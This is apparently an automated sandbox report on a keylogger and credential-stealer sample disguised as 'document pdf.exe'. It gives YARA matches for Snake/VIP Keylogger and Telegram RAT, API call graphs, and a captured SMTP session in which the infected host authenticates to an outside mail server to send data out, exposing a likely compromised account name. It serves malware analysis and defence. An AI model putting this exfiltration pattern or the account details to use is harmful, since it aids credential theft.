Jan 6, 2025 16:01:32.162626982 CET  587          49890      208.91.199.225  192.168.2.6     250-us2.outbound.mailhostbox.com
                                                                                            250-PIPELINING
                                                                                            250-SIZE 41648128
                                                                                            250-VRFY
                                                                                            250-ETRN
                                                                                            250-STARTTLS
                                                                                            250-AUTH PLAIN LOGIN
                                                                                            250-AUTH=PLAIN LOGIN
                                                                                            250-ENHANCEDSTATUSCODES
                                                                                            250-8BITMIME
                                                                                            250-DSN
                                                                                            250 CHUNKING
Jan 6, 2025 16:01:32.163796902 CET  49890        587        192.168.2.6     208.91.199.225  AUTH login ZGlyZWN0b3JAaWdha3Vpbi5jb20=
Jan 6, 2025 16:01:32.318629026 CET  587          49890      208.91.199.225  192.168.2.6     334 UGFzc3dvcmQ6
Jan 6, 2025 16:01:32.482357979 CET  587          49890      208.91.199.225  192.168.2.6     235 2.7.0 Authentication successful
Jan 6, 2025 16:01:32.482727051 CET  49890        587        192.168.2.6     208.91.199.225  MAIL FROM:<director@igakuin.com>
Jan 6, 2025 16:01:32.636765957 CET  587          49890      208.91.199.225  192.168.2.6     250 2.1.0 Ok
Jan 6, 2025 16:01:32.642741919 CET  49890        587        192.168.2.6     208.91.199.225  RCPT TO:<director@igakuin.com>
Jan 6, 2025 16:01:32.811463118 CET  587          49890      208.91.199.225  192.168.2.6     550 5.4.6 <director@igakuin.com>: Recipient address rejected: Email Sending Quota Exceeded
Jan 6, 2025 16:01:34.888252020 CET  587          49910      208.91.199.225  192.168.2.6     220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 6, 2025 16:01:34.888520956 CET  49910        587        192.168.2.6     208.91.199.225  EHLO 680718
Jan 6, 2025 16:01:35.041076899 CET  587          49910      208.91.199.225  192.168.2.6     250-us2.outbound.mailhostbox.com
                                                                                            250-PIPELINING
                                                                                            250-SIZE 41648128
                                                                                            250-VRFY
                                                                                            250-ETRN
                                                                                            250-STARTTLS
                                                                                            250-AUTH PLAIN LOGIN
                                                                                            250-AUTH=PLAIN LOGIN
                                                                                            250-ENHANCEDSTATUSCODES
                                                                                            250-8BITMIME
                                                                                            250-DSN
                                                                                            250 CHUNKING
Jan 6, 2025 16:01:35.041270971 CET  49910        587        192.168.2.6     208.91.199.225  AUTH login ZGlyZWN0b3JAaWdha3Vpbi5jb20=
Jan 6, 2025 16:01:35.193973064 CET  587          49910      208.91.199.225  192.168.2.6     334 UGFzc3dvcmQ6
Jan 6, 2025 16:01:35.350573063 CET  587          49910      208.91.199.225  192.168.2.6     235 2.7.0 Authentication successful
Jan 6, 2025 16:01:35.353735924 CET  49910        587        192.168.2.6     208.91.199.225  MAIL FROM:<director@igakuin.com>
Jan 6, 2025 16:01:35.505721092 CET  587          49910      208.91.199.225  192.168.2.6     250 2.1.0 Ok
Jan 6, 2025 16:01:35.508920908 CET  49910        587        192.168.2.6     208.91.199.225  RCPT TO:<director@igakuin.com>
Jan 6, 2025 16:01:35.675283909 CET  587          49910      208.91.199.225  192.168.2.6     550 5.4.6 <director@igakuin.com>: Recipient address rejected: Email Sending Quota Exceeded

                                                                                                                      Target ID:0
                                                                                                                      Start time:10:01:07
                                                                                                                      Start date:06/01/2025
                                                                                                                      Path:C:\Users\user\Desktop\document pdf.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\document pdf.exe"
                                                                                                                      Imagebase:0xde0000
                                                                                                                      File size:759'808 bytes
                                                                                                                      MD5 hash:C67B6FF2D472BF82DC4DA545DBC37A43
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:3
                                                                                                                      Start time:10:01:08
                                                                                                                      Start date:06/01/2025
                                                                                                                      Path:C:\Users\user\Desktop\document pdf.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\document pdf.exe"
                                                                                                                      Imagebase:0x630000
                                                                                                                      File size:759'808 bytes
                                                                                                                      MD5 hash:C67B6FF2D472BF82DC4DA545DBC37A43
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4665157890.0000000002C63000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      Target ID:6
                                                                                                                      Start time:10:01:08
                                                                                                                      Start date:06/01/2025
                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 1340
                                                                                                                      Imagebase:0xbd0000
                                                                                                                      File size:483'680 bytes
                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:10.2%
                                                                                                                        Dynamic/Decrypted Code Coverage:97%
                                                                                                                        Signature Coverage:3%
                                                                                                                        Total number of Nodes:101
                                                                                                                        Total number of Limit Nodes:6
                                                                                                                        execution_graph 42624 580ab00 42625 580ab3a 42624->42625 42626 580abb6 42625->42626 42627 580abcb 42625->42627 42632 58098cc 42626->42632 42629 58098cc 3 API calls 42627->42629 42631 580abda 42629->42631 42633 58098d7 42632->42633 42634 580abc1 42633->42634 42637 580bdd0 42633->42637 42644 580bdbf 42633->42644 42638 580bdd1 42637->42638 42651 5809a0c 42638->42651 42640 580bdf7 42640->42634 42641 580be21 CreateIconFromResourceEx 42643 580be9e 42641->42643 42643->42634 42645 580bdcc 42644->42645 42646 5809a0c CreateIconFromResourceEx 42645->42646 42649 580bdea 42646->42649 42647 580bdf7 42647->42634 42648 580be21 CreateIconFromResourceEx 42650 580be9e 42648->42650 42649->42647 42649->42648 42650->42634 42652 580be20 CreateIconFromResourceEx 42651->42652 42654 580bdea 42652->42654 42654->42640 42654->42641 42655 57122e0 42658 5711740 42655->42658 42659 5712330 CreateWindowExW 42658->42659 42661 5712454 42659->42661 42661->42661 42662 306b6d0 42665 306b7b7 42662->42665 42663 306b6df 42666 306b7fc 42665->42666 42667 306b7d9 42665->42667 42666->42663 42667->42666 42668 306ba00 GetModuleHandleW 42667->42668 42669 306ba2d 42668->42669 42669->42663 42670 306da60 42671 306daa6 42670->42671 42674 306dc40 42671->42674 42677 306d818 42674->42677 42678 306dca8 DuplicateHandle 42677->42678 42679 306db93 42678->42679 42680 176d01c 42681 176d034 42680->42681 42682 176d08e 42681->42682 42687 5713248 42681->42687 42696 571176c 42681->42696 42705 57124d8 42681->42705 42709 57124e8 42681->42709 42690 5713285 42687->42690 42688 57132b9 42726 5711894 42688->42726 42690->42688 42691 57132a9 42690->42691 42713 57133d1 42691->42713 42717 57134ac 42691->42717 42722 57133e0 42691->42722 42692 57132b7 42697 5711777 42696->42697 42698 57132b9 42697->42698 42700 57132a9 42697->42700 42699 5711894 CallWindowProcW 42698->42699 42701 57132b7 42699->42701 42702 57133d1 
CallWindowProcW 42700->42702 42703 57133e0 CallWindowProcW 42700->42703 42704 57134ac CallWindowProcW 42700->42704 42702->42701 42703->42701 42704->42701 42706 571250e 42705->42706 42707 571176c CallWindowProcW 42706->42707 42708 571252f 42707->42708 42708->42682 42710 571250e 42709->42710 42711 571176c CallWindowProcW 42710->42711 42712 571252f 42711->42712 42712->42682 42714 57133f4 42713->42714 42730 5713498 42714->42730 42715 5713480 42715->42692 42718 571346a 42717->42718 42719 57134ba 42717->42719 42721 5713498 CallWindowProcW 42718->42721 42720 5713480 42720->42692 42721->42720 42724 57133f4 42722->42724 42723 5713480 42723->42692 42725 5713498 CallWindowProcW 42724->42725 42725->42723 42727 571189f 42726->42727 42728 571499a CallWindowProcW 42727->42728 42729 5714949 42727->42729 42728->42729 42729->42692 42731 57134a9 42730->42731 42733 57148db 42730->42733 42731->42715 42734 5711894 CallWindowProcW 42733->42734 42735 57148ea 42734->42735 42735->42731 42736 3064668 42737 3064672 42736->42737 42739 3064759 42736->42739 42740 306477d 42739->42740 42744 3064868 42740->42744 42748 3064859 42740->42748 42746 306488f 42744->42746 42745 306496c 42745->42745 42746->42745 42752 30644c4 42746->42752 42750 3064868 42748->42750 42749 306496c 42749->42749 42750->42749 42751 30644c4 CreateActCtxA 42750->42751 42751->42749 42753 30658f8 CreateActCtxA 42752->42753 42755 30659bb 42753->42755 42755->42755

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275364495.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5710000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: )$/$K$]
                                                                                                                        • API String ID: 0-2940783203
                                                                                                                        • Opcode ID: 14cf0e2627c566444fa6540d01ef546b604a066a786115e6efd941adac52baba
                                                                                                                        • Instruction ID: 802bcbf09a4eacf8a84651e9da7914464ce37e26487df9c04d7846dc567fed4c
                                                                                                                        • Opcode Fuzzy Hash: 14cf0e2627c566444fa6540d01ef546b604a066a786115e6efd941adac52baba
                                                                                                                        • Instruction Fuzzy Hash: 00224C30A00705CFDB19EF78C89869AB7B2FF89300F1485A9D9096F365DF75A985CB90

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 157 5717480-5717482 158 5717484-5717488 157->158 159 5717489-571748a 157->159 158->159 160 571746e-571747f 158->160 161 5717491-57174fe 159->161 162 571748b-5717490 159->162 160->157 171 5717508-571750c call 5717304 161->171 162->161 173 5717511-571751c 171->173 175 5717526-571752a call 5717314 173->175 177 571752f-57175ac call 5717324 call 5717334 call 5717324 175->177 192 57175b3-57175c4 call 5717344 177->192 194 57175c9-571760b call 5717354 call 5717364 192->194 198 5717610-571761a call 5717374 194->198 200 571761f-571766a call 5717384 call 5717394 198->200 207 571766f-571767c 200->207 315 571767f call 571bf98 207->315 316 571767f call 571bf88 207->316 208 5717682-57176c4 call 5717344 call 5717354 212 57176c9-57176f8 call 5717364 208->212 214 57176fd-571778d call 5717374 212->214 225 5717794-571779b 214->225 313 571779d call 5802908 225->313 314 571779d call 5802918 225->314 226 57177a3-57177b8 228 5717bd2-5717be3 226->228 229 57177be-57177d7 226->229 232 5717be8-5717c02 call 5717434 228->232 229->228 233 57177dd-5717802 229->233 235 5717c07-5717c17 232->235 233->228 239 5717808-571782d 233->239 239->228 242 5717833-5717880 239->242 249 5717887-5717898 242->249 317 571789a call 5803938 249->317 318 571789a call 5803948 249->318 250 57178a0-57178a2 251 57178a4-57178aa 250->251 252 57178ba-57178be 250->252 253 57178ac 251->253 254 57178ae-57178b0 251->254 255 57178c4-57178c8 252->255 253->252 254->252 255->228 256 57178ce-57178d1 255->256 257 57178dc 256->257 258 57178e8-57179cc call 57173a4 call 5717344 call 5717354 call 5717364 call 57173b4 call 57173c4 call 57173d4 257->258 276 57179d4-57179e0 call 57173e4 258->276 278 57179e5-5717a6e call 57173f4 call 5717404 276->278 287 5717a79-5717a95 278->287 309 5717a98 call 5808eb0 287->309 310 5717a98 call 5808e9e 287->310 288 5717a9b-5717ad0 311 5717ad2 call 5809300 288->311 312 
5717ad2 call 5809310 288->312 289 5717ad7-5717b08 call 5717414 294 5717b20-5717bb5 call 5717424 call 5717354 289->294 295 5717b0a-5717b10 289->295 305 5717bc1-5717bc3 294->305 296 5717b12 295->296 297 5717b14-5717b16 295->297 296->294 297->294 307 5717bc5 call 580c128 305->307 308 5717bc5 call 580c138 305->308 306 5717bca-5717bd1 307->306 308->306 309->288 310->288 311->289 312->289 313->226 314->226 315->208 316->208 317->250 318->250
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275364495.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5710000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: )$/$K$]
                                                                                                                        • API String ID: 0-2940783203
                                                                                                                        • Opcode ID: fceefacebf101e80e599571e4993efda2799a7eb110389afd7c9b0c15dd47570
                                                                                                                        • Instruction ID: 726f518118eda5b71ded18ec6578992f7a6d206508f2fd957ec89a852d839319
                                                                                                                        • Opcode Fuzzy Hash: fceefacebf101e80e599571e4993efda2799a7eb110389afd7c9b0c15dd47570
                                                                                                                        • Instruction Fuzzy Hash: CC225C30A00745CFCB19EF78C89869ABBB2FF85300F1485A9D8096F365DF75A985CB91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275577156.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5800000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5cf1a88c41d21b78c83a8e327102417b9f40ca0420d0ecdde017cedfceecd428
                                                                                                                        • Instruction ID: 1bb5afd4dc07df046fdc8d79aacfa7bd13e8e403d049c5bda25e685b5f1d033d
                                                                                                                        • Opcode Fuzzy Hash: 5cf1a88c41d21b78c83a8e327102417b9f40ca0420d0ecdde017cedfceecd428
                                                                                                                        • Instruction Fuzzy Hash: 4863EA74A04219CFDB64DF68C888A9EB7B2FF89310F159595D819EB2A1DB30ED81CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275577156.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5800000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9c885db1dcfa92a988da612841b71cbcc15feb17fe088f5a6cf95f7653fd3438
                                                                                                                        • Instruction ID: b487e82859f62e10d2d099f12c9712535dfc7d7c0ab4405c3c12f05238b3df98
                                                                                                                        • Opcode Fuzzy Hash: 9c885db1dcfa92a988da612841b71cbcc15feb17fe088f5a6cf95f7653fd3438
                                                                                                                        • Instruction Fuzzy Hash: AE526B34A402199FDF54DF68C884A6DBBB2BF88310B159169ED16DB3B5DB31EC41CB90

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1964 58098cc-580ac20 1968 580b0e6-580b14c 1964->1968 1969 580ac26-580ac2b 1964->1969 1975 580b153-580b1db 1968->1975 1969->1968 1970 580ac31-580ac4e 1969->1970 1970->1975 1976 580ac54-580ac58 1970->1976 2024 580b1e6-580b268 1975->2024 1978 580ac67-580ac6b 1976->1978 1979 580ac5a-580ac64 call 580990c 1976->1979 1980 580ac7a-580ac81 1978->1980 1981 580ac6d-580ac77 call 580990c 1978->1981 1979->1978 1986 580ac87-580aca1 1980->1986 1987 580ad79-580ad7e 1980->1987 1981->1980 2003 580aca9-580ad6d call 5809918 * 2 1986->2003 1990 580ad80-580ad84 1987->1990 1991 580ad86-580ad8b 1987->1991 1990->1991 1994 580ad8d-580ad91 1990->1994 1995 580ad9d-580adcd call 5809924 * 3 1991->1995 1999 580ad97-580ad9a 1994->1999 2000 580b479-580b48a 1994->2000 2023 580add3-580add6 1995->2023 1995->2024 1999->1995 2009 580b491-580b494 2000->2009 2010 580b48c 2000->2010 2003->1987 2031 580ad6f 2003->2031 2013 580b495-580b4cb 2009->2013 2010->2013 2014 580b48e 2010->2014 2014->2009 2023->2024 2025 580addc-580adde 2023->2025 2038 580b270-580b2f2 2024->2038 2025->2024 2029 580ade4-580ae19 2025->2029 2029->2038 2039 580ae1f-580ae28 2029->2039 2031->1987 2046 580b2fa-580b37c 2038->2046 2040 580af8b-580af8f 2039->2040 2041 580ae2e-580ae88 call 5809924 * 2 call 5809934 * 2 2039->2041 2045 580af95-580af99 2040->2045 2040->2046 2086 580ae9a 2041->2086 2087 580ae8a-580ae93 2041->2087 2048 580b384-580b3b1 2045->2048 2049 580af9f-580afa5 2045->2049 2046->2048 2063 580b3b8-580b43a 2048->2063 2053 580afa7 2049->2053 2054 580afa9-580afde 2049->2054 2057 580afe5-580afeb 2053->2057 2054->2057 2062 580aff1-580aff9 2057->2062 2057->2063 2067 580b000-580b002 2062->2067 2068 580affb-580afff 2062->2068 2119 580b442-580b471 2063->2119 2076 580b064-580b06a 2067->2076 2077 580b004-580b028 2067->2077 2068->2067 2078 580b089-580b0be 2076->2078 2079 580b06c-580b087 2076->2079 2105 
580b031-580b035 2077->2105 2106 580b02a-580b02f 2077->2106 2098 580b0c5-580b0d1 2078->2098 2079->2098 2091 580ae9e-580aea0 2086->2091 2087->2091 2093 580ae95-580ae98 2087->2093 2100 580aea2 2091->2100 2101 580aea7-580aeab 2091->2101 2093->2091 2098->2119 2120 580b0d7-580b0e3 2098->2120 2100->2101 2103 580aeb9-580aebf 2101->2103 2104 580aead-580aeb4 2101->2104 2114 580aec1-580aec7 2103->2114 2115 580aec9-580aece 2103->2115 2108 580af56-580af5a 2104->2108 2105->2000 2110 580b03b-580b03e 2105->2110 2111 580b041-580b052 2106->2111 2117 580af79-580af85 2108->2117 2118 580af5c-580af76 2108->2118 2110->2111 2157 580b054 call 580bdd0 2111->2157 2158 580b054 call 580bdbf 2111->2158 2121 580aed4-580aeda 2114->2121 2115->2121 2117->2040 2117->2041 2118->2117 2119->2000 2125 580aee0-580aee5 2121->2125 2126 580aedc-580aede 2121->2126 2131 580aee7-580aef9 2125->2131 2126->2131 2128 580b05a-580b062 2128->2098 2136 580af03-580af08 2131->2136 2137 580aefb-580af01 2131->2137 2139 580af0e-580af15 2136->2139 2137->2139 2143 580af17-580af19 2139->2143 2144 580af1b 2139->2144 2147 580af20-580af2b 2143->2147 2144->2147 2148 580af2d-580af30 2147->2148 2149 580af4f 2147->2149 2148->2108 2151 580af32-580af38 2148->2151 2149->2108 2153 580af3a-580af3d 2151->2153 2154 580af3f-580af48 2151->2154 2153->2149 2153->2154 2154->2108 2156 580af4a-580af4d 2154->2156 2156->2108 2156->2149 2157->2128 2158->2128
Memory Dump Source
• Source File: 00000000.00000002.2275577156.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5800000_document pdf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2275577156.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5800000_document pdf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2275577156.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5800000_document pdf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2275577156.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5800000_document pdf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph
(interactive graph not reproduced; function entry block at 306b7b7, basic blocks marked Executed / Not Executed)
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 0306BA1E
Memory Dump Source
• Source File: 00000000.00000002.2272667102.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3060000_document pdf.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0

Control-flow Graph
(interactive graph not reproduced; function entry block at 57122b0, basic blocks marked Executed / Not Executed)
Memory Dump Source
• Source File: 00000000.00000002.2275364495.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5710000_document pdf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph
(interactive graph not reproduced; function entry block at 5711740, basic blocks marked Executed / Not Executed)
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05712442
Memory Dump Source
• Source File: 00000000.00000002.2275364495.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5710000_document pdf.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0

Control-flow Graph
(interactive graph not reproduced; function entry block at 5711894, basic blocks marked Executed / Not Executed)
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 057149C1
Memory Dump Source
• Source File: 00000000.00000002.2275364495.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5710000_document pdf.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0

Control-flow Graph
(interactive graph not reproduced; function entry block at 30658ec, basic blocks marked Executed / Not Executed)
APIs
• CreateActCtxA.KERNEL32(?), ref: 030659A9
Memory Dump Source
• Source File: 00000000.00000002.2272667102.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3060000_document pdf.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0

Control-flow Graph
(interactive graph not reproduced; function entry block at 30644c4, basic blocks marked Executed / Not Executed)
APIs
• CreateActCtxA.KERNEL32(?), ref: 030659A9
Memory Dump Source
• Source File: 00000000.00000002.2272667102.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3060000_document pdf.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0

Control-flow Graph
(interactive graph not reproduced; function entry block at 580bdd0, calls CreateIconFromResourceEx, basic blocks marked Executed / Not Executed)
Memory Dump Source
• Source File: 00000000.00000002.2275577156.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5800000_document pdf.jbxd
Similarity
• API ID: CreateFromIconResource
• String ID:
• API String ID: 3668623891-0

Control-flow Graph
(interactive graph not reproduced; function entry block at 306d818, basic blocks marked Executed / Not Executed)
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0306DC6E,?,?,?,?,?), ref: 0306DD2F
Memory Dump Source
• Source File: 00000000.00000002.2272667102.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3060000_document pdf.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
                                                                                                                        • Opcode ID: 77739c875fcffa64a7c3aa18ff755c0d4bd140a2f29c28d018fa2b8a32135611
                                                                                                                        • Instruction ID: 790d2ce98ecd886bc83c9249e3acb1e40e9836ddb25046373ae8b6d68892e934
                                                                                                                        • Opcode Fuzzy Hash: 77739c875fcffa64a7c3aa18ff755c0d4bd140a2f29c28d018fa2b8a32135611
                                                                                                                        • Instruction Fuzzy Hash: CD2103B5900249DFDB10CF9AD984AEEBBF8EB48320F14841AE918A3311D374A954CFA5

                                                                                                                        Control-flow Graph (basic blocks and edges; the rendered graph and its Executed / Not Executed legend are not reproduced)
                                                                                                                        • 5809a0c-580be9c (CreateIconFromResourceEx) -> 580bea5-580bec2
                                                                                                                        • 5809a0c-580be9c -> 580be9e-580bea4
                                                                                                                        • 580be9e-580bea4 -> 580bea5-580bec2
                                                                                                                        APIs
                                                                                                                        • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0580BDEA,?,?,?,?,?), ref: 0580BE8F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275577156.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5800000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFromIconResource
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3668623891-0
                                                                                                                        • Opcode ID: 1e69096e566b59cbe11a01152a22b4708f6b35898803c1dc19d5a71805e0a071
                                                                                                                        • Instruction ID: 2ab4440a11d1ae16cd1daa2ff44b390d7d2305b896fee1d8358f767ef98c1f1c
                                                                                                                        • Opcode Fuzzy Hash: 1e69096e566b59cbe11a01152a22b4708f6b35898803c1dc19d5a71805e0a071
                                                                                                                        • Instruction Fuzzy Hash: D61126B580024D9FDB10CF9AD844BEEBFF9EB48324F14841AEA54A7250C375A954CFA5

                                                                                                                        Control-flow Graph (basic blocks and edges; the rendered graph and its Executed / Not Executed legend are not reproduced)
                                                                                                                        • 306b9b8-306b9f8 -> 306ba00-306ba2b (GetModuleHandleW)
                                                                                                                        • 306b9b8-306b9f8 -> 306b9fa-306b9fd
                                                                                                                        • 306b9fa-306b9fd -> 306ba00-306ba2b (GetModuleHandleW)
                                                                                                                        • 306ba00-306ba2b (GetModuleHandleW) -> 306ba34-306ba48
                                                                                                                        • 306ba00-306ba2b (GetModuleHandleW) -> 306ba2d-306ba33
                                                                                                                        • 306ba2d-306ba33 -> 306ba34-306ba48
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0306BA1E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272667102.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_3060000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0
                                                                                                                        • Opcode ID: 1ecdfb7ef182b0ecb5fdc98329eb1f2f4a2bcf6461d5064cc1e912e5433d37c7
                                                                                                                        • Instruction ID: 21998ef7ef790dff8810ce4ed59abcb3601d82603afa95cf1fa4e40483e517b3
                                                                                                                        • Opcode Fuzzy Hash: 1ecdfb7ef182b0ecb5fdc98329eb1f2f4a2bcf6461d5064cc1e912e5433d37c7
                                                                                                                        • Instruction Fuzzy Hash: E71110B6C003498FCB20CF9AD844BDEFBF4AF88224F14841AD819A7200C379A545CFA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2272304406.000000000175D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0175D000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_175d000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
